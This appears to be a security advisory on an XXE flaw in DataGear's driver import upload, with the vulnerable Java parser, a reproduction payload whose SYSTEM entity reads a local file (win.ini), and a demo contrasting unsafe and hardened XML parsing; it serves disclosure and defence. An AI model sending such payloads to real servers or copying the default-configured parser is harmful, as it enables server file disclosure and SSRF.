XML External Entity (XXE) Vulnerability in /driverEntity/uploadImportFile
Description
DataGear is an open-source and free data visualization analysis platform that allows you to freely create any kind of data dashboard you want, supporting access to multiple data sources such as SQL, CSV, Excel, HTTP interface, JSON, etc.
DataGear 5.1.0 and below has an XXE vulnerability that can be exploited to disclose local files from the server's file system or to perform Server-Side Request Forgery (SSRF).
Unsafe Code
The readDriverEntities function in org/datagear/connection/XmlDriverEntityManager.java parses XML with a default-configured DocumentBuilderFactory, without disabling DTDs (Document Type Definitions) or external entity resolution. Because the XML content comes from the uploaded file and is attacker-controlled, any SYSTEM entity declared in it is resolved by the server, leading to XML External Entity injection.
import java.io.Reader;
import java.util.ArrayList;
import java.util.List;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;
import org.xml.sax.InputSource;

@Override
protected List<DriverEntity> readDriverEntities(Reader in) throws DriverEntityManagerException
{
    List<DriverEntity> driverEntities = new ArrayList<DriverEntity>();
    DocumentBuilderFactory documentBuilderFactory;
    DocumentBuilder documentBuilder;
    Document document;
    try
    {
        // Default factory: DOCTYPE declarations and external entity resolution stay enabled.
        documentBuilderFactory = DocumentBuilderFactory.newInstance();
        documentBuilder = documentBuilderFactory.newDocumentBuilder();
        // 'in' is the attacker-supplied driverEntityInfo.xml taken from the uploaded zip,
        // so any SYSTEM entity it declares is fetched and expanded here.
        document = documentBuilder.parse(new InputSource(in));
        // ... (remainder of the method is not shown in this report)
Steps to Reproduce
Upload a zip file containing a driverEntityInfo.xml file to /driverEntity/uploadImportFile, with the following content for driverEntityInfo.xml:
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!DOCTYPE driver-entities [
<!ENTITY edward SYSTEM "file:///C:/windows/win.ini">
]>
<driver-entities>
<driver-entity>
<id>&edward;</id>
<driver-class-name>com.mysql.jdbc.Driver</driver-class-name>
</driver-entity>
<driver-entity>
<id>mysql-jre8</id>
<driver-class-name>com.mysql.cj.jdbc.Driver</driver-class-name>
</driver-entity>
<driver-entity>
<id>oracle</id>
<driver-class-name>oracle.jdbc.OracleDriver</driver-class-name>
</driver-entity>
</driver-entities>
After sending the request, the response contains the values produced by XML parsing, with the content of the referenced file returned in place of &edward;.
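The following is an added example and is not DataGear's own code. It reproduces the default-configured parse from the unsafe snippet above (parseUnsafe), packs a payload of the same shape into a driverEntityInfo.xml inside an in-memory zip as the reproduction step describes, and contrasts the result with a hardened factory (parseHardened) that refuses any DOCTYPE. The SYSTEM entity points at a temporary file the demo creates rather than win.ini so it runs on any OS; the class and method names are the example's own, the feature URIs are the standard JAXP/Xerces ones, and it assumes Java 11 or later.

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.Reader;
import java.io.StringReader;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.Path;
import java.util.zip.ZipEntry;
import java.util.zip.ZipInputStream;
import java.util.zip.ZipOutputStream;
import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;
import org.xml.sax.InputSource;
import org.xml.sax.SAXParseException;

public class XxeDemo {

    // Vulnerable: the same default-configured factory used by readDriverEntities.
    static Document parseUnsafe(Reader in) throws Exception {
        DocumentBuilderFactory f = DocumentBuilderFactory.newInstance();
        return f.newDocumentBuilder().parse(new InputSource(in));
    }

    // Hardened: reject any DOCTYPE, so no internal or external entity can be declared,
    // and additionally turn off external entity/DTD loading as belt and braces.
    static Document parseHardened(Reader in) throws Exception {
        DocumentBuilderFactory f = DocumentBuilderFactory.newInstance();
        f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        f.setFeature("http://xml.org/sax/features/external-general-entities", false);
        f.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        f.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        f.setXIncludeAware(false);
        f.setExpandEntityReferences(false);
        f.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, "");
        f.setAttribute(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");
        return f.newDocumentBuilder().parse(new InputSource(in));
    }

    // Constructed payload in the shape of the report's driverEntityInfo.xml,
    // with the SYSTEM entity pointing at a file of our choosing.
    static String payload(Path secret) {
        return "<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\n"
            + "<!DOCTYPE driver-entities [\n"
            + "<!ENTITY edward SYSTEM \"" + secret.toUri() + "\">\n"
            + "]>\n"
            + "<driver-entities>\n"
            + "  <driver-entity>\n"
            + "    <id>&edward;</id>\n"
            + "    <driver-class-name>com.mysql.jdbc.Driver</driver-class-name>\n"
            + "  </driver-entity>\n"
            + "</driver-entities>\n";
    }

    // Pack driverEntityInfo.xml into a zip in memory, like the archive sent to uploadImportFile.
    static byte[] buildZip(String xml) throws Exception {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ZipOutputStream zos = new ZipOutputStream(bos)) {
            zos.putNextEntry(new ZipEntry("driverEntityInfo.xml"));
            zos.write(xml.getBytes(StandardCharsets.UTF_8));
            zos.closeEntry();
        }
        return bos.toByteArray();
    }

    // Extract one entry from the zip, as the import side does before parsing.
    static String readEntry(byte[] zip, String name) throws Exception {
        try (ZipInputStream zis = new ZipInputStream(new ByteArrayInputStream(zip))) {
            ZipEntry e;
            while ((e = zis.getNextEntry()) != null) {
                if (e.getName().equals(name)) {
                    return new String(zis.readAllBytes(), StandardCharsets.UTF_8);
                }
            }
        }
        throw new IllegalStateException("entry not found: " + name);
    }

    public static void main(String[] args) throws Exception {
        Path secret = Files.createTempFile("xxe-demo", ".txt");
        Files.writeString(secret, "SECRET-FILE-CONTENT");
        String xml = readEntry(buildZip(payload(secret)), "driverEntityInfo.xml");

        // Default factory: <id> now holds the file content, which is what leaks in the response.
        Document d = parseUnsafe(new StringReader(xml));
        System.out.println("unsafe parser resolved <id> to: "
            + d.getElementsByTagName("id").item(0).getTextContent());

        // Hardened factory: the DOCTYPE itself is rejected before any entity is declared.
        try {
            parseHardened(new StringReader(xml));
            System.out.println("hardened parser accepted the document (unexpected)");
        } catch (SAXParseException e) {
            System.out.println("hardened parser rejected it: " + e.getMessage());
        }
        Files.deleteIfExists(secret);
    }
}
```

Disallowing the DOCTYPE declaration is the decisive setting: a document that cannot declare entities cannot reference external ones, and it also blocks entity-expansion (billion laughs) payloads. The remaining features matter for parsers or call sites where a DOCTYPE must be tolerated.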
Why does my modified URL request not return any output?
Upload a zip file containing a driverEntityInfo.xml. If the format is incorrect, it will not be parsed.
This vulnerability has been fixed in version 5.2.0.